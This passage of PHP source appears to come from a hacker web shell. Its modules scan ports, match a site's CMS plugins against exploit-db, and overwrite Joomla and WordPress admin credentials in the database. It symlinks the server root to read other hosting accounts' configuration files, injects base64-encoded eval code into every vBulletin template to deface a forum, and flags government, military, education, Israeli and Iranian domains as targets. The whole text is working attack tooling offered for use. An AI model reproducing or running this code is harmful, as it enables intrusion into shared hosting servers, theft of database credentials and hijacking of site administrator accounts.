  1824. echo '<br><br><center><br><b>Port Scanner</b><br>';
  1825. $start = strip_tags($_POST['start']);
  1826. $end = strip_tags($_POST['end']);
  1827. $host = strip_tags($_POST['host']);
  1828.  
  1829. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1830. for($i = $start; $i<=$end; $i++){
  1831. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1832. if($fp){
  1833. echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
  1834. }
  1835. flush();
  1836. }
  1837. }else{
  1838.  
  1839. echo '
  1840. <input type="hidden" name="y" value="phptools">
  1841. Host:<br />
  1842. <input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost"/><br />
  1843. Port start:<br />
  1844. <input type="text" style="color:#FF0000;background-color:#000000" name="start" value="0"/><br />
  1845. Port end:<br />
  1846. <input type="text" style="color:#FF0000;background-color:#000000" name="end" value="5000"/><br />
  1847. <input type="submit" style="color:#FF0000" value="Scan Ports" />
  1848. </form></center>';
  1849. }
  1850. }
  1851.  
  1852. elseif(isset($_GET['x']) && ($_GET['x'] == 'string-encode'))
  1853. {
  1854. ?>
  1855. <form action="?y=<?php echo $pwd; ?>&amp;x=string-encode" method="post">
  1856. <?php
  1857.  
  1858. /*
  1859. Simple STRING TO HASH
  1860. Code by Altenator IWnet
  1861. */
  1862.  
  1863. echo "<center><br><br><form method='post'>
  1864. Insert STRING Here : <input type='text' style='color:#FF0000;background-color:#000000' name='hash_input' value='' /><br><br>
  1865. <input type='submit' name='submit_hash' style='color:#FF0000;background-color:#000000' value='Encode' /><br><br>";
  1866.  
  1867. if (isset($_POST['submit_hash'])) {
  1868. if (isset($_POST['hash_input'])) {
  1869. $hash_input = $_POST['hash_input'];
  1870. }
  1871.  
  1872. if ($hash_input=="") { // show error if nothing inserted in input box
  1873. echo 'Nothing Inserted!';
  1874. } else {
  1875. if (isset($hash_input)) {
  1876. foreach (hash_algos() as $hash_setoption) { // set to use all hash function
  1877. $calculate_hash = hash($hash_setoption, $hash_input, false); // calculate all hash and declare variable
  1878. echo "<table border='1'><tbody>";
  1879. echo "<tr><th><font style='color:#9F7CEB'>$hash_setoption</font></th><th><font style='color:#5BC740'>$calculate_hash</font></th></tr>"; // output
  1880. }
  1881. }
  1882. echo '</tbody></table></center>';
  1883. }
  1884. }
  1885. }
  1886.  
  1887. elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner'))
  1888. {
  1889. ?>
  1890. <form action="?y=<?php echo $pwd; ?>&amp;x=cms-scanner" method="post">
  1891.  
  1892. <?php
  1893.  
  1894. function ask_exploit_db($component){
  1895.  
  1896. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1897.  
  1898. $result = @file_get_contents($exploitdb);
  1899.  
  1900. if (eregi("No results",$result)) {
  1901.  
  1902. echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  1903.  
  1904. }else{
  1905.  
  1906. echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";
  1907.  
  1908. }
  1909. }
  1910.  
  1911. /**************************************************************/
  1912. /* Joomla Conf */
  1913.  
  1914. function get_components($site){
  1915.  
  1916. $source = @file_get_contents($site);
  1917.  
  1918. preg_match_all('{option,(.*?)/}i',$source,$f);
  1919. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1920. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1921.  
  1922. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1923.  
  1924. $coms=array();
  1925.  
  1926. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1927.  
  1928. foreach(array_unique($arz) as $x){
  1929.  
  1930. $coms[]=$x;
  1931. }
  1932.  
  1933. foreach($coms as $comm){
  1934.  
  1935. echo "<tr><td>$comm</td>";
  1936.  
  1937. ask_exploit_db($comm);
  1938.  
  1939. }
  1940.  
  1941. }
  1942.  
  1943. /**************************************************************/
  1944. /* WP Conf */
  1945.  
  1946. function get_plugins($site){
  1947.  
  1948. $source = @file_get_contents($site);
  1949.  
  1950. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1951.  
  1952. $plugins=array_unique($f[1]);
  1953.  
  1954. if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1955.  
  1956. foreach($plugins as $plugin){
  1957.  
  1958. echo "<tr><td>$plugin</td>";
  1959.  
  1960. ask_exploit_db($plugin);
  1961.  
  1962. }
  1963.  
  1964. }
  1965.  
  1966. /**************************************************************/
  1967. /* Nuke's Conf */
  1968.  
  1969. function get_numod($site){
  1970.  
  1971. $source = @file_get_contents($site);
  1972.  
  1973. preg_match_all('{?name=(.*?)/}i',$source,$f);
  1974. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1975. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1976.  
  1977. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1978.  
  1979. $coms=array();
  1980.  
  1981. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  1982.  
  1983. foreach(array_unique($arz) as $x){
  1984.  
  1985. $coms[]=$x;
  1986. }
  1987.  
  1988. foreach($coms as $nmod){
  1989.  
  1990. echo "<tr><td>$nmod</td>";
  1991.  
  1992. ask_exploit_db($nmod);
  1993.  
  1994. }
  1995.  
  1996. }
  1997.  
  1998. /*****************************************************/
  1999. /* Xoops Conf */
  2000.  
  2001. function get_xoomod($site){
  2002.  
  2003. $source = @file_get_contents($site);
  2004.  
  2005. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  2006.  
  2007. $arz=array_merge($f[1]);
  2008.  
  2009. $coms=array();
  2010.  
  2011. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  2012.  
  2013. foreach(array_unique($arz) as $x){
  2014.  
  2015. $coms[]=$x;
  2016. }
  2017.  
  2018. foreach($coms as $xmod){
  2019.  
  2020. echo "<tr><td>$xmod</td>";
  2021.  
  2022. ask_exploit_db($xmod);
  2023.  
  2024. }
  2025.  
  2026. }
  2027.  
  2028. /**************************************************************/
  2029. /* Header */
  2030. function t_header($site){
  2031.  
  2032. echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
  2033.  
  2034. echo'
  2035. <tr id="oo">
  2036. <td>Site : <a href="'.$site.'">'.$site.'</a></td>
  2037. <td>Exploit-db</b></td>
  2038. <td>Exploit it !</td>
  2039. </tr>
  2040. ';
  2041.  
  2042. }
  2043.  
  2044. ?>
  2045. <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  2046.  
  2047. <body>
  2048.  
  2049. <p align="center">&nbsp;</p>
  2050. <p align="center">&nbsp;</p>
  2051. <p align="center">&nbsp;</p>
  2052. <form method="POST" action="">
  2053. <p align="center">&nbsp;
  2054. </p>
  2055. <p align="center">
  2056. <font size="4"><br></font></p>
  2057. <p align="center">Site :
  2058. <input type="text" name="site" size="33" style="color:#FF0000;background-color:#000000" value="http://www.site.com/"><select style="color:#FF0000;background-color:#000000" size="1" name="what">
  2059. <option>Wordpress</option>
  2060. <option>Joomla</option>
  2061. <option>Nuke's</option>
  2062. <option>Xoops</option>
  2063. </select><input style="color:#FF0000;background-color:#000000" type="submit" value="Scan"></p>
  2064. </form>
  2065. <?
  2066.  
  2067. // Start Scan :P :P ...
  2068.  
  2069. if($_POST){
  2070.  
  2071. $site=strip_tags(trim($_POST['site']));
  2072.  
  2073. t_header($site);
  2074.  
  2075. echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
  2076. echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
  2077. echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
  2078. echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
  2079. echo '</table></body></html>';
  2080.  
  2081. }
  2082. }
  2083.  
  2084.  
  2085. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  2086. {
  2087. ?>
  2088. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  2089.  
  2090. <?php
  2091.  
  2092. @error_reporting(0);
  2093. @ini_set('error_log',NULL);
  2094. echo '
  2095. <div class="com">
  2096. <form method="post">
  2097. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  2098. <br />
  2099. <tr>
  2100. <td>Host :</td>
  2101. <td><input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost" /></td>
  2102. </tr>
  2103. <tr>
  2104. <td>user :</td>
  2105. <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  2106. </tr>
  2107. <tr>
  2108. <td>Pass :</td><td><input style="color:#FF0000;background-color:#000000" type="text" name="pass"/></td>
  2109. </tr>
  2110. <tr>
  2111. <td>db :</td>
  2112. <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  2113. </tr>
  2114. <tr>
  2115. <td>dbprefix :</td>
  2116. <td><input type="text" style="color:#FF0000;background-color:#000000" name="jop" value="jos_users" /></td>
  2117. </tr>
  2118. <tr>
  2119. <td>Admin User :</td>
  2120. <td><input type="text" style="color:#FF0000;background-color:#000000" name="users" value="useradmin" /></td>
  2121. </tr>
  2122. <tr>
  2123. <td>Admin Password :</td>
  2124. <td><input type="text" style="color:#FF0000;background-color:#000000" name="passwd" value="passadmin" /></td>
  2125. </tr>
  2126. <tr>
  2127. <td colspan="6" align="center" style="color:#FF0000;background-color:#000000" width="70%"> <input type="submit" value="SQL" style="color:#FF0000;background-color:#000000" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  2128.  
  2129. </tr>
  2130. </table>
  2131. </form> </div></center>';
  2132.  
  2133. $host = $_POST['host'];
  2134. $user = $_POST['user'];
  2135. $pass = $_POST['pass'];
  2136. $db = $_POST['db'];
  2137. $jop = $_POST['jop'];
  2138. $users = $_POST['users'];
  2139. $admpas = $_POST['passwd'];
  2140.  
  2141. function joomlahash($password) {
  2142. $random = rand();
  2143. $string = md5("$random");
  2144. $yourpassword = "$password";
  2145. $random32 = "$string";
  2146. $join = "$password$random32";
  2147. $md5 = md5("$join");
  2148. $jomlaahash = "$md5:$random32";
  2149. return $jomlaahash;
  2150. }
  2151.  
  2152. if(isset($host) ) {
  2153. $con =@ mysql_connect($host,$user,$pass) or die ;
  2154. $cond =@ mysql_select_db($db) or die;
  2155.  
  2156. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator");
  2157. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = Super Administrator");
  2158. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = deprecated");
  2159. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = deprecated");
  2160.  
  2161. }else{
  2162. echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  2163. }
  2164. }
  2165.  
  2166. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  2167. {
  2168. ?>
  2169. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  2170.  
  2171. <?php
  2172.  
  2173. @error_reporting(0);
  2174. @ini_set('error_log',NULL);
  2175. echo '
  2176. <div class="com">
  2177. <form method="post">
  2178. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  2179. <br />
  2180.  
  2181. <tr>
  2182. <td>Host :</td>
  2183. <td><input type="text" name="host" style="color:#FF0000;background-color:#000000" value="localhost" /></td>
  2184. </tr>
  2185.  
  2186. <tr>
  2187. <td>user :</td>
  2188. <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  2189. </tr>
  2190. <tr>
  2191. <td>Pass :</td><td><input type="text" style="color:#FF0000;background-color:#000000" name="pass"/></td>
  2192. </tr>
  2193. <tr>
  2194. <td>db :</td>
  2195. <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  2196. </tr>
  2197. <tr>
  2198. <td>user admin :</td>
  2199. <td><input type="text" style="color:#FF0000;background-color:#000000" name="useradmin" value="admin" /></td>
  2200. </tr>
  2201. <tr>
  2202. <td>pass admin :</td>
  2203. <td><input type="text" style="color:#FF0000;background-color:#000000" name="passadmin" value="admin"/></td>
  2204. </tr>
  2205. <tr>
  2206. <td colspan="6" align="center" width="70%"> <input type="submit" style="color:#FF0000;background-color:#000000" value="SQL" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  2207.  
  2208. </tr>
  2209. </table>
  2210. </form> </div></center>';
  2211.  
  2212. $host = $_POST['host'];
  2213. $user = $_POST['user'];
  2214. $pass = $_POST['pass'];
  2215. $db = $_POST['db'];
  2216. $useradmin = $_POST['useradmin'];
  2217. $pass_ad = $_POST['passadmin'];
  2218.  
  2219. if(isset($host) ) {
  2220. $con =@ mysql_connect($host,$user,$pass) or die ;
  2221. $sedb =@ mysql_select_db($db) or die;
  2222. $crypt = crypt($pass_ad);
  2223. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1');
  2224. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1');
  2225. if ($query)
  2226. {
  2227. echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
  2228. }
  2229. else if (!$query)
  2230. {
  2231. echo "error";
  2232. }
  2233.  
  2234. }else
  2235. {
  2236. echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  2237. }
  2238. }
  2239.  
  2240.  
  2241. elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info'))
  2242. {
  2243. ?>
  2244. <form action="?y=<?php echo $pwd; ?>&amp;x=web-info" method="post">
  2245.  
  2246.  
  2247. <?php
  2248. @set_time_limit(0);
  2249. @error_reporting(0);
  2250.  
  2251. function sws_domain_info($site)
  2252. {
  2253. $getip = @file_get_contents("http://networktools.nl/whois/$site");
  2254. flush();
  2255. $ip = @findit($getip,'<pre>','</pre>');
  2256.  
  2257. return $ip;
  2258. flush();
  2259. }
  2260.  
  2261.  
  2262. function sws_net_info($site)
  2263. {
  2264. $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  2265. $ip = @findit($getip,'<pre>','</pre>');
  2266.  
  2267. return $ip;
  2268. flush();
  2269. }
  2270.  
  2271. function sws_site_ser($site)
  2272. {
  2273. $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  2274. $ip = @findit($getip,'<pre>','</pre>');
  2275.  
  2276. return $ip;
  2277. flush();
  2278. }
  2279.  
  2280. function sws_sup_dom($site)
  2281. {
  2282. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  2283. $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  2284.  
  2285. return $ip;
  2286. flush();
  2287. }
  2288.  
  2289. function sws_port_scan($ip)
  2290. {
  2291.  
  2292. $list_post = array('80','21','22','2082','25','53','110','443','143');
  2293.  
  2294. foreach ($list_post as $o_port)
  2295. {
  2296. $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  2297.  
  2298. if($connect)
  2299. {
  2300. echo " $ip : $o_port &nbsp;&nbsp;&nbsp; <u style=\"color: #009900\">Open</u> <br /><br />";
  2301. flush();
  2302. }
  2303. }
  2304.  
  2305. }
  2306.  
  2307. function findit($mytext,$starttag,$endtag) {
  2308. $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  2309. $posRight = @stripos($mytext,$endtag,$posLeft+1);
  2310. return @substr($mytext,$posLeft,$posRight-$posLeft);
  2311. flush();
  2312. }
  2313.  
  2314. echo '<br><br><center>';
  2315.  
  2316.  
  2317. echo '
  2318. <br />
  2319. <div class="sc"><form method="post">
  2320. Site to scan : <input type="text" name="site" size="30" style="color:#FF0000;background-color:#000000" value="site.com" /> &nbsp;&nbsp <input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !" />
  2321. </form></div>';
  2322.  
  2323.  
  2324. if(isset($_POST['scan']))
  2325. {
  2326.  
  2327.  
  2328.  
  2329.  
  2330. $site = @htmlentities($_POST['site']);
  2331. if (empty($site)){die('<br /><br /> Not add IP .. !');}
  2332.  
  2333. $ip_port = @gethostbyname($site);
  2334.  
  2335. echo "
  2336.  
  2337.  
  2338.  
  2339.  
  2340.  
  2341. <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
  2342.  
  2343. <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
  2344. <div class=\"ru\"> <br /><br /><pre>
  2345. ";
  2346. echo "".sws_port_scan($ip_port)." </pre></div> ";
  2347.  
  2348. flush();
  2349.  
  2350.  
  2351.  
  2352. echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  2353. <div class=\"ru\">
  2354. <pre>".sws_domain_info($site)."</pre></div>";
  2355. flush();
  2356.  
  2357. echo "
  2358. <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  2359. <div class=\"ru\">
  2360. <pre>".sws_net_info($site)."</pre> </div>";
  2361. flush();
  2362.  
  2363. echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  2364. <div class=\"ru\">
  2365. <pre>".sws_sup_dom($site)."</pre> </div>";
  2366. flush();
  2367.  
  2368.  
  2369. echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  2370. <div class=\"ru\">
  2371. <pre>".sws_site_ser($site)."</pre> </div>
  2372. <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
  2373. flush();
  2374.  
  2375.  
  2376.  
  2377.  
  2378.  
  2379. }
  2380.  
  2381. echo '</center>';
  2382. }
  2383.  
  2384. elseif(isset($_GET['x']) && ($_GET['x'] == 'identify'))
  2385. {
  2386. ?>
  2387. <form action="?y=<?php echo $pwd; ?>&amp;x=identify" method="post">
  2388.  
  2389. <?php
  2390.  
  2391. echo "<center><br><br>
  2392. <font style=\"color:#FF0000\">This function is used to identify some CMS on all website in this server</font><br>
  2393. <font style=\"color:#FF0000\">may take very long time and this shell gonna lag, if you want to continue, press \"Check Now\" button</font><br><br>
  2394. <form type=post>
  2395. <input type='submit' style=\"color:#FF0000\" value='Check Now' name='checkingstart'>
  2396. </form></center>";
  2397.  
  2398. if (isset($_POST['checkingstart'])) {
  2399.  
  2400. echo "<center>";
  2401.  
  2402. $WebUrl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  2403. $Explode=explode('/',$WebUrl );
  2404. $WebUrl =str_replace($Explode[count($Explode)-1],'',$WebUrl );
  2405.  
  2406.  
  2407. @mkdir('sym',0777);
  2408. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2409. $write =@fopen ('sym/.htaccess','w');
  2410. fwrite($write ,$htaccess);
  2411. @symlink('/','sym/root');
  2412. $filelocation = basename(__FILE__);
  2413.  
  2414. $read_named_conf = @file('/etc/named.conf');
  2415. if(!$read_named_conf)
  2416. {
  2417. die (" can't read /etc/named.conf,Please use <a href='?vvip=sytc'>/etc Symlink</a>");
  2418. }
  2419. $new12 = explode (', ', $dis_func);
  2420. if (in_array('posix_getpwuid', $new12)){die('<center><b># posix_getpwuid is Not Supported</b></center>');}
  2421. else
  2422. {
  2423. echo "<div class='tmp'>
  2424. <table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td> Domains </td><td> Script </td>";
  2425. foreach($read_named_conf as $subject){
  2426. if(eregi('zone',$subject)){
  2427. preg_match_all('#zone "(.*)"#',$subject,$string);
  2428. flush();
  2429. if(strlen(trim($string[1][0])) >2){
  2430. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2431. $Wordpress=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/wp-config.php';
  2432. $wp=get_headers($Wordpress);
  2433. $haystackwp=$wp[0];
  2434. $Wordpress2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/blog/wp-config.php';
  2435. $wp2=get_headers($Wordpress2);
  2436. $haystackwp2=$wp2[0];
  2437. $Joomla=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/configuration.php';
  2438. $jmla=get_headers($Joomla);
  2439. $haystackjmla=$jmla[0];
  2440. $Joomla2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/joomla/configuration.php';
  2441. $jmla2=get_headers($Joomla2);
  2442. $haystackjmla2=$jmla2[0];
  2443. $Vbulletin=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/includes/config.php';
  2444. $vb=get_headers($Vbulletin);
  2445. $haystackvb=$vb[0];
  2446. $Vbulletin3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/vb/includes/config.php';
  2447. $vb3=get_headers($Vbulletin3);
  2448. $haystackvb2=$vb3[0];
  2449. $Vbulletin5=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/forum/includes/config.php';
  2450. $vb5=get_headers($Vbulletin5);
  2451. $haystackvb5=$vb5[0];
  2452. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'public_html/clients/configuration.php';
  2453. $whm=get_headers($whmcs1);
  2454. $haystackwhm=$whm[0];
  2455. $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/support/configuration.php';
  2456. $whm=get_headers($whmcs1);
  2457. $haystackwhm=$whm[0];
  2458. $whmcs2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2459. $whm2=get_headers($whmcs2);
  2460. $haystackwhm2=$whm2[0];
  2461. $whmcs3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/submitticket.php';
  2462. $whm3=get_headers($whmcs3);
  2463. $haystackwhm3=$whm3[0];
  2464. $whmcs4=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
  2465. $whm4=get_headers($whmcs4);
  2466. $haystackwhm=$whm4[0];
  2467. $Websitez = strpos($haystackwp,'200');
  2468. $Websitez='&nbsp;';
  2469. if (strpos($haystackwp,'200') == true )
  2470. {
  2471. $Websitez="<a href='".$Wordpress."' target='_blank'>Wordpress</a>";
  2472. }
  2473. elseif (strpos($haystackwp2,'200') == true)
  2474. {
  2475. $Websitez="<a href='".$Wordpress2."' target='_blank'>Wordpress</a>";
  2476. }
  2477. elseif (strpos($haystackjmla,'200') == true and strpos($haystackwhm3,'200') == true )
  2478. {
  2479. $Websitez=" <a href='".$whmcs3."' target='_blank'>WHMCS</a>";
  2480. }
  2481. elseif (strpos($haystackwhm,'200') == true)
  2482. {
  2483. $Websitez =" <a href='".$whmcs1."' target='_blank'>WHMCS</a>";
  2484. }
  2485. elseif (strpos($haystackwhm2,'200') == true)
  2486. {
  2487. $Websitez =" <a href='".$whmcs2."' target='_blank'>WHMCS</a>";
  2488. }
  2489. elseif (strpos($haystackjmla,'200') == true)
  2490. {
  2491. $Websitez=" <a href='".$Joomla."' target='_blank'>Joomla</a>";
  2492. }
  2493. elseif (strpos($haystackjmla2,'200') == true)
  2494. {
  2495. $Websitez=" <a href='".$Joomla2."' target='_blank'>Joomla</a>";
  2496. }
  2497. elseif (strpos($haystackvb,'200') == true)
  2498. {
  2499. $Websitez=" <a href='".$Vbulletin."' target='_blank'>vBulletin</a>";
  2500. }
  2501. elseif (strpos($haystackvb2,'200') == true)
  2502. {
  2503. $Websitez=" <a href='".$Vbulletin3."' target='_blank'>vBulletin</a>";
  2504. }
  2505. elseif (strpos($Vbulletin4,'200') == true)
  2506. {
  2507. $Websitez=" <a href='".$Vbulletin5."' target='_blank'>vBulletin</a>";
  2508. }
  2509. else
  2510. {
  2511. continue;
  2512. }
  2513. $name = $UID['name'] ;
  2514. echo '<tr><td><a href=http://www.'.$string[1][0].'/>'.$string[1][0].'</a></td>
  2515. <td>'.$Websitez.'</td></tr></center>';
  2516. flush();
  2517. }
  2518. }
  2519. }
  2520. }
  2521. }
  2522. }
  2523.  
  2524. elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
  2525. {
  2526. ?>
  2527. <form action="?y=<?php echo $pwd; ?>&amp;x=vb" method="post">
  2528.  
  2529. <br><br><br><div align="center">
  2530. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
  2531. <font color="#00FF00">&nbsp;vB Index Changer</font><font color="#FF0000">
  2532. <font face="Tahoma">! Change All Pages For Forum !&nbsp;
  2533. <br></font></div><br>
  2534.  
  2535. <?
  2536.  
  2537. if(empty($_POST['index'])){
  2538. echo "<center><FORM method=\"POST\">
  2539. host : <INPUT size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\">
  2540. database : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
  2541. username : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"username\" type=\"text\">
  2542. password : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"vb\" name=\"password\" type=\"text\"><br>
  2543. <br>
  2544. <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
  2545. <INPUT value=\"Set\" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  2546. </FORM></center>";
  2547. }else{
  2548. $localhost = $_POST['localhost'];
  2549. $database = $_POST['database'];
  2550. $username = $_POST['username'];
  2551. $password = $_POST['password'];
  2552. $index = $_POST['index'];
  2553. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2554. @mysql_select_db($database) or die(mysql_error());
  2555.  
  2556. $index=str_replace("\'","'",$index);
  2557.  
  2558. $set_index = "{\${eval(base64_decode(\'";
  2559.  
  2560. $set_index .= base64_encode("echo \"$index\";");
  2561.  
  2562.  
  2563. $set_index .= "\'))}}{\${exit()}}</textarea>";
  2564.  
  2565. echo("UPDATE template SET template ='".$set_index."' ") ;
  2566. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  2567.  
  2568. if($ok){
  2569. echo "!! update finish !!<br><br>";
  2570. }
  2571.  
  2572. }
  2573. # Footer
  2574. }
  2575.  
  2576.  
  2577. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  2578. {
  2579. ?>
  2580. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  2581.  
  2582. <?php
  2583.  
  2584. @set_time_limit(0);
  2585.  
  2586. echo "<center>";
  2587.  
  2588. @mkdir('sym',0777);
  2589. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2590. $write =@fopen ('sym/.htaccess','w');
  2591. fwrite($write ,$htaccess);
  2592. @symlink('/','sym/root');
  2593. $filelocation = basename(__FILE__);
  2594. $read_named_conf = @file('/etc/named.conf');
  2595. if(!$read_named_conf)
  2596. {
  2597. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2598. }
  2599. else
  2600. {
  2601. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2602. foreach($read_named_conf as $subject){
  2603. if(eregi('zone',$subject)){
  2604. preg_match_all('#zone "(.*)"#',$subject,$string);
  2605. flush();
  2606. if(strlen(trim($string[1][0])) >2){
  2607. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2608. $name = $UID['name'] ;
  2609. @symlink('/','sym/root');
  2610. $name = $string[1][0];
  2611. $iran = '\.ir';
  2612. $israel = '\.il';
  2613. $indo = '\.id';
  2614. $sg12 = '\.sg';
  2615. $edu = '\.edu';
  2616. $gov = '\.gov';
  2617. $gose = '\.go';
  2618. $gober = '\.gob';
  2619. $mil1 = '\.mil';
  2620. $mil2 = '\.mi';
  2621. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2622. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  2623. {
  2624. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2625. }
  2626. echo "
  2627. <tr>
  2628.  
  2629. <td>
  2630. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2631. </td>
  2632.  
  2633. <td>
  2634. '.$UID['name']."
  2635. </td>
  2636.  
  2637. <td>
  2638. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2639. </td>
  2640.  
  2641. </tr></div> ";
  2642. flush();
  2643. }
  2644. }
  2645. }
  2646. }
  2647.  
  2648. echo "</center></table>";
